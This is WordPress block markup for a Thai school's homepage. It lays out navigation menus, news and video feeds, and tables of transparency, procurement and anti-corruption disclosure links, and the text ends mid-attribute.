{\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}]} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"author\":[],\"offset\":\"0\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#6096b4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"to